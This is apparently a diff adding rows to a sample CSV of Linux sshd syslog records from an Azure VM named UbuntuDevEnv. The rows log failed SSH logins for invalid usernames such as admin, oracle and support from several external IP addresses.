+1192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:56,UbuntuDevEnv,2019-06-26 18:50:55,auth,UbuntuDevEnv,info,Invalid user tomberli from 54.222.204.1 port 47368,69187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomberli,54.222.204.1,47368,,
+1193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:56,UbuntuDevEnv,2019-06-26 18:50:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:56,UbuntuDevEnv,2019-06-26 18:50:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.222.204.1,69187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.222.204.1,,0,
+1195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:57,UbuntuDevEnv,2019-06-26 18:50:57,auth,UbuntuDevEnv,info,Failed password for invalid user tomberli from 54.222.204.1 port 47368 ssh2,69187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomberli,54.222.204.1,47368,,
+1196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:58,UbuntuDevEnv,2019-06-26 18:50:57,auth,UbuntuDevEnv,info,Received disconnect from 54.222.204.1 port 47368:11: Bye Bye [preauth],69187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.222.204.1,47368,,
+1197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:58,UbuntuDevEnv,2019-06-26 18:50:57,auth,UbuntuDevEnv,info,Disconnected from invalid user tomberli 54.222.204.1 port 47368 [preauth],69187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomberli,54.222.204.1,47368,,
+1198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:31,UbuntuDevEnv,2019-06-26 18:52:30,auth,UbuntuDevEnv,info,Invalid user user2 from 165.227.41.202 port 55874,69519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,165.227.41.2,55874,,
+1199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:31,UbuntuDevEnv,2019-06-26 18:52:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,69519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:31,UbuntuDevEnv,2019-06-26 18:52:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:33,UbuntuDevEnv,2019-06-26 18:52:32,auth,UbuntuDevEnv,info,Failed password for invalid user user2 from 165.227.41.202 port 55874 ssh2,69519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,165.227.41.2,55874,,
+1202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:33,UbuntuDevEnv,2019-06-26 18:52:32,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 55874:11: Bye Bye [preauth],69519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,55874,,
+1203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:33,UbuntuDevEnv,2019-06-26 18:52:32,auth,UbuntuDevEnv,info,Disconnected from invalid user user2 165.227.41.202 port 55874 [preauth],69519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,165.227.41.2,55874,,
+1204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:37,UbuntuDevEnv,2019-06-26 18:52:37,auth,UbuntuDevEnv,info,Invalid user admin from 60.174.40.2 port 35553,69548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,60.174.40.2,35553,,
+1205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:37,UbuntuDevEnv,2019-06-26 18:52:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:37,UbuntuDevEnv,2019-06-26 18:52:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=60.174.40.2,69548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,60.174.40.2,,0,
+1207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:39,UbuntuDevEnv,2019-06-26 18:52:39,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 60.174.40.2 port 35553 ssh2,69548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,60.174.40.2,35553,,
+1208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:39,UbuntuDevEnv,2019-06-26 18:52:39,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 60.174.40.2 port 35553 [preauth],69548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,60.174.40.2,35553,,
+1209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:52:39,UbuntuDevEnv,2019-06-26 18:52:39,auth,UbuntuDevEnv,info,Received disconnect from 60.174.40.2 port 35553:11: Bye Bye [preauth],69548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,60.174.40.2,35553,,
+1210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:53:22,UbuntuDevEnv,2019-06-26 18:53:22,auth,UbuntuDevEnv,info,Invalid user support from 134.175.42.162 port 49620,69787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,134.175.42.1,49620,,
+1211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:53:22,UbuntuDevEnv,2019-06-26 18:53:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.175.42.162,69787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.175.42.1,,0,
+1212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:53:22,UbuntuDevEnv,2019-06-26 18:53:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:53:25,UbuntuDevEnv,2019-06-26 18:53:24,auth,UbuntuDevEnv,info,Failed password for invalid user support from 134.175.42.162 port 49620 ssh2,69787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,134.175.42.1,49620,,
+1214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:53:25,UbuntuDevEnv,2019-06-26 18:53:24,auth,UbuntuDevEnv,info,Disconnected from invalid user support 134.175.42.162 port 49620 [preauth],69787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,134.175.42.1,134,,
+1215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:53:25,UbuntuDevEnv,2019-06-26 18:53:24,auth,UbuntuDevEnv,info,"Received disconnect from 134.175.42.162 port 49620:11: Normal Shutdown, Thank you for playing [preauth]",69787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.175.42.1,49620,,
+1216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:54:18,UbuntuDevEnv,2019-06-26 18:54:18,auth,UbuntuDevEnv,info,Invalid user wwwroot from 165.227.41.202 port 46692,69983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wwwroot,165.227.41.2,46692,,
+1217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:54:18,UbuntuDevEnv,2019-06-26 18:54:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:54:18,UbuntuDevEnv,2019-06-26 18:54:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,69983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:54:20,UbuntuDevEnv,2019-06-26 18:54:19,auth,UbuntuDevEnv,info,Failed password for invalid user wwwroot from 165.227.41.202 port 46692 ssh2,69983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wwwroot,165.227.41.2,46692,,
+1220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:54:20,UbuntuDevEnv,2019-06-26 18:54:20,auth,UbuntuDevEnv,info,Disconnected from invalid user wwwroot 165.227.41.202 port 46692 [preauth],69983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wwwroot,165.227.41.2,46692,,
+1221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:54:20,UbuntuDevEnv,2019-06-26 18:54:20,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 46692:11: Bye Bye [preauth],69983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,46692,,
+1222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:07,UbuntuDevEnv,2019-06-26 18:56:07,auth,UbuntuDevEnv,info,Invalid user steam from 165.227.41.202 port 37564,70363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,165.227.41.2,37564,,
+1223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:07,UbuntuDevEnv,2019-06-26 18:56:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,70363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:07,UbuntuDevEnv,2019-06-26 18:56:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:10,UbuntuDevEnv,2019-06-26 18:56:09,auth,UbuntuDevEnv,info,Failed password for invalid user steam from 165.227.41.202 port 37564 ssh2,70363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,165.227.41.2,37564,,
+1226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:10,UbuntuDevEnv,2019-06-26 18:56:09,auth,UbuntuDevEnv,info,Disconnected from invalid user steam 165.227.41.202 port 37564 [preauth],70363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,165.227.41.2,37564,,
+1227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:10,UbuntuDevEnv,2019-06-26 18:56:09,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 37564:11: Bye Bye [preauth],70363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,37564,,
+1228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:30,UbuntuDevEnv,2019-06-26 18:56:29,auth,UbuntuDevEnv,info,Invalid user admin from 80.108.220.67 port 45136,70427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,80.108.220.6,45136,,
+1229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:30,UbuntuDevEnv,2019-06-26 18:56:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,70427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+1230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:30,UbuntuDevEnv,2019-06-26 18:56:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:31,UbuntuDevEnv,2019-06-26 18:56:31,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 80.108.220.67 port 45136 ssh2,70427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,80.108.220.6,45136,,
+1232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:31,UbuntuDevEnv,2019-06-26 18:56:31,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 45136:11: Bye Bye [preauth],70427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,45136,,
+1233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:56:31,UbuntuDevEnv,2019-06-26 18:56:31,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 80.108.220.67 port 45136 [preauth],70427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,80.108.220.6,45136,,
+1234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:57:42,UbuntuDevEnv,2019-06-26 18:57:41,auth,UbuntuDevEnv,info,Connection closed by 54.222.204.1 port 49948 [preauth],70626,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.222.204.1,49948,,
+1235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:58:01,UbuntuDevEnv,2019-06-26 18:58:01,auth,UbuntuDevEnv,info,Invalid user rq from 165.227.41.202 port 56744,70765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rq,165.227.41.2,56744,,
+1236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:58:01,UbuntuDevEnv,2019-06-26 18:58:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:58:01,UbuntuDevEnv,2019-06-26 18:58:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,70765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:58:03,UbuntuDevEnv,2019-06-26 18:58:03,auth,UbuntuDevEnv,info,Failed password for invalid user rq from 165.227.41.202 port 56744 ssh2,70765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rq,165.227.41.2,56744,,
+1239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:58:03,UbuntuDevEnv,2019-06-26 18:58:03,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 56744:11: Bye Bye [preauth],70765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,56744,,
+1240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:58:03,UbuntuDevEnv,2019-06-26 18:58:03,auth,UbuntuDevEnv,info,Disconnected from invalid user rq 165.227.41.202 port 56744 [preauth],70765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rq,165.227.41.2,56744,,
+1241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:59:52,UbuntuDevEnv,2019-06-26 18:59:52,auth,UbuntuDevEnv,info,Invalid user oracle from 165.227.41.202 port 47638,71156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,165.227.41.2,47638,,
+1242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:59:52,UbuntuDevEnv,2019-06-26 18:59:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:59:52,UbuntuDevEnv,2019-06-26 18:59:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,71156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:59:55,UbuntuDevEnv,2019-06-26 18:59:54,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 165.227.41.202 port 47638 ssh2,71156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,165.227.41.2,47638,,
+1245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:59:55,UbuntuDevEnv,2019-06-26 18:59:54,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 165.227.41.202 port 47638 [preauth],71156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,165.227.41.2,47638,,
+1246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:59:55,UbuntuDevEnv,2019-06-26 18:59:54,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 47638:11: Bye Bye [preauth],71156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,47638,,
+1247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:09,UbuntuDevEnv,2019-06-26 19:01:08,auth,UbuntuDevEnv,info,Invalid user helpdesk from 54.222.204.1 port 35030,71483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,54.222.204.1,35030,,
+1248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:09,UbuntuDevEnv,2019-06-26 19:01:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.222.204.1,71483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.222.204.1,,0,
+1249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:09,UbuntuDevEnv,2019-06-26 19:01:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:11,UbuntuDevEnv,2019-06-26 19:01:10,auth,UbuntuDevEnv,info,Failed password for invalid user helpdesk from 54.222.204.1 port 35030 ssh2,71483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,54.222.204.1,35030,,
+1251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:11,UbuntuDevEnv,2019-06-26 19:01:11,auth,UbuntuDevEnv,info,Disconnected from invalid user helpdesk 54.222.204.1 port 35030 [preauth],71483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,54.222.204.1,35030,,
